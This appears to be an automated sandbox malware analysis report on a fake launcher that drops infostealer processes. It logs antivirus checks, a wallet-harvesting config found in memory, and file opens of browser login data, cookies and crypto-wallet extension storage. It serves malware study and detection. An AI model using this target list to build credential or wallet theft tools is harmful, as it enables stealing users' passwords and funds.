            Source: C:\Users\user\Desktop\LauncherV9.exeCode function: EnumSystemLocalesW,0_2_00007FF746321F64
            Source: C:\Users\user\Desktop\LauncherV9.exeCode function: GetLocaleInfoW,0_2_00007FF74632E848
            Source: C:\Users\user\Desktop\LauncherV9.exeCode function: EnumSystemLocalesW,0_2_00007FF74632E568
            Source: C:\Users\user\Desktop\LauncherV9.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,0_2_00007FF74632E600
            Source: C:\Users\user\Desktop\LauncherV9.exeCode function: EnumSystemLocalesW,GetUserDefaultLCID,ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,0_2_00007FF74632EB84
            Source: C:\Users\user\Desktop\LauncherV9.exeCode function: GetLocaleInfoW,0_2_00007FF74632243C
            Source: C:\Users\user\Desktop\LauncherV9.exeCode function: EnumSystemLocalesW,0_2_00007FF74632E498
            Source: C:\Users\user\Desktop\LauncherV9.exeCode function: TranslateName,TranslateName,GetACP,IsValidCodePage,GetLocaleInfoW,0_2_00007FF74632E13C
            Source: C:\Users\user\Desktop\LauncherV9.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_00007FF74632E9A0
            Source: C:\Users\user\Desktop\LauncherV9.exeCode function: GetLocaleInfoW,0_2_00007FF74632EA50
            Source: C:\Users\user\AppData\Local\Service.exeCode function: GetLocaleInfoW,22_2_00007FF621C172A8
            Source: C:\Users\user\AppData\Local\Service.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,22_2_00007FF621C171F8
            Source: C:\Users\user\AppData\Local\Service.exeCode function: TranslateName,TranslateName,GetACP,IsValidCodePage,GetLocaleInfoW,22_2_00007FF621C16994
            Source: C:\Users\user\AppData\Local\Service.exeCode function: EnumSystemLocalesW,22_2_00007FF621C16CF0
            Source: C:\Users\user\AppData\Local\Service.exeCode function: EnumSystemLocalesW,GetUserDefaultLCID,ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,22_2_00007FF621C173DC
            Source: C:\Users\user\AppData\Local\Service.exeCode function: GetLocaleInfoW,22_2_00007FF621C0D3E4
            Source: C:\Users\user\AppData\Local\Service.exeCode function: EnumSystemLocalesW,22_2_00007FF621C0CF0C
            Source: C:\Users\user\AppData\Local\Service.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,22_2_00007FF621C16E58
            Source: C:\Users\user\AppData\Local\Service.exeCode function: EnumSystemLocalesW,22_2_00007FF621C16DC0
            Source: C:\Users\user\AppData\Local\Service.exeCode function: GetLocaleInfoW,22_2_00007FF621C170A0
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\dll.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Users\user\Desktop\LauncherV9.exeCode function: 0_2_00007FF746312648 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00007FF746312648
            Source: dll.exe, 00000010.00000003.1571451074.0000000004015000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1571316639.0000000004030000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1611173934.0000000004015000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1558746783.0000000004015000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610764637.000000000400F000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1586774168.0000000004015000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1558094984.0000000004015000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
            Source: C:\Users\user\AppData\Local\dll.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

            Stealing of Sensitive Information

            barindex
            Source: Yara matchFile source: Process Memory Space: dll.exe PID: 8252, type: MEMORYSTR
            Source: Yara matchFile source: 13.2.jaclo.exe.ba0000.0.unpack, type: UNPACKEDPE
            Source: dll.exe, 00000010.00000003.1573715800.00000000011E2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Electrum-LTC
            Source: dll.exe, 00000010.00000003.1573715800.00000000011E2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/ElectronCash
            Source: dll.exe, 00000010.00000003.1573715800.00000000011E2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: window-state.json
            Source: dll.exe, 00000010.00000003.1553180293.0000000001253000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: "d":2,"fs":20971520},{"t":0,"p":"%appdata%\\Binance","m":["app-store.json",".finger-print.fp","simple-storage.json","window-state.json"],"z":"Wallets/Binance","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\com.liberty.jaxx\\IndexedDB","m":["*"],"z":"W^
            Source: dll.exe, 00000010.00000003.1553180293.0000000001253000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \\Ethereum","m":["keystore"],"z":"Wallets/Ethereum","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\Exodus\\exodus.wallet","m":["*"],"z":"Wallets/Exodus","d":0,"fs":20971520},{"t":0,"p":"%appdata%\\Ledger Live","m":["*"],"z":"Wallets/Ledger Live","d":2Ps%
            Source: dll.exe, 00000010.00000003.1472449424.0000000001269000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ExodusWeb3y
            Source: dll.exe, 00000010.00000003.1573715800.00000000011E2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Ethereum
            Source: dll.exe, 00000010.00000003.1527625878.000000000124F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
            Source: dll.exe, 00000010.00000003.1553180293.0000000001253000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \\Ethereum","m":["keystore"],"z":"Wallets/Ethereum","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\Exodus\\exodus.wallet","m":["*"],"z":"Wallets/Exodus","d":0,"fs":20971520},{"t":0,"p":"%appdata%\\Ledger Live","m":["*"],"z":"Wallets/Ledger Live","d":2Ps%
            Source: dll.exe, 00000010.00000003.1472449424.0000000001269000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ledger Live
            Source: C:\Users\user\AppData\Local\dll.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
            Source: C:\Users\user\AppData\Local\dll.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
            Source: C:\Users\user\AppData\Local\dll.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
            Source: C:\Users\user\AppData\Local\dll.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cert9.dbJump to behavior
            Source: C:\Users\user\AppData\Local\dll.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
            Source: C:\Users\user\AppData\Local\dll.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
            Source: C:\Users\user\AppData\Local\dll.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
            Source: C:\Users\user\AppData\Local\dll.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
            Source: C:\Users\user\AppData\Local\dll.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
            Source: C:\Users\user\AppData\Local\dll.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Source: C:\Users\user\AppData\Local\dll.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
            Source: C:\Users\user\AppData\Local\dll.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
            Source: C:\Users\user\AppData\Local\dll.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
            Source: C:\Users\user\AppData\Local\dll.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
            Source: C:\Users\user\AppData\Local\dll.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
            Source: C:\Users\user\AppData\Local\dll.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
            Source: C:\Users\user\AppData\Local\dll.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
            Source: C:\Users\user\AppData\Local\dll.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
            Source: C:\Users\user\AppData\Local\dll.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqliteJump to behavior
            Source: C:\Users\user\AppData\Local\dll.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
            Source: C:\Users\user\AppData\Local\dll.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
            Source: C:\Users\user\AppData\Local\dll.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
            Source: C:\Users\user\AppData\Local\dll.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
            Source: C:\Users\user\AppData\Local\dll.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
            Source: C:\Users\user\AppData\Local\dll.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
            Source: C:\Users\user\AppData\Local\dll.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\AppData\Local\dll.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
            Source: C:\Users\user\AppData\Local\dll.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
            Source: C:\Users\user\AppData\Local\dll.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
            Source: C:\Users\user\AppData\Local\dll.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
            Source: C:\Users\user\AppData\Local\dll.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
            Source: C:\Users\user\AppData\Local\dll.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
            Source: C:\Users\user\AppData\Local\dll.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
            Source: C:\Users\user\AppData\Local\dll.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\formhistory.sqliteJump to behavior
            Source: C:\Users\user\AppData\Local\dll.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
            Source: C:\Users\user\AppData\Local\dll.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Users\user\AppData\Local\dll.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
            Source: C:\Users\user\AppData\Local\dll.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
            Source: C:\Users\user\AppData\Local\dll.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
            Source: C:\Users\user\AppData\Local\dll.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
            Source: C:\Users\user\AppData\Local\dll.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
            Source: C:\Users\user\AppData\Local\dll.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Users\user\AppData\Local\dll.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
            Source: C:\Users\user\AppData\Local\dll.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
            Source: C:\Users\user\AppData\Local\dll.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
            Source: C:\Users\user\AppData\Local\dll.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
            Source: C:\Users\user\AppData\Local\dll.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
            Source: C:\Users\user\AppData\Local\dll.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
            Source: C:\Users\user\AppData\Local\dll.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
            Source: C:\Users\user\AppData\Local\dll.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
            Source: C:\Users\user\AppData\Local\dll.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
            Source: C:\Users\user\AppData\Local\dll.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
            Source: C:\Users\user\AppData\Local\dll.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
            Source: C:\Users\user\AppData\Local\dll.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
            Source: C:\Users\user\AppData\Local\dll.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
            Source: C:\Users\user\AppData\Local\dll.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
            Source: C:\Users\user\AppData\Local\dll.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
            Source: C:\Users\user\AppData\Local\dll.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\AppData\Local\dll.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
            Source: C:\Users\user\AppData\Local\dll.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
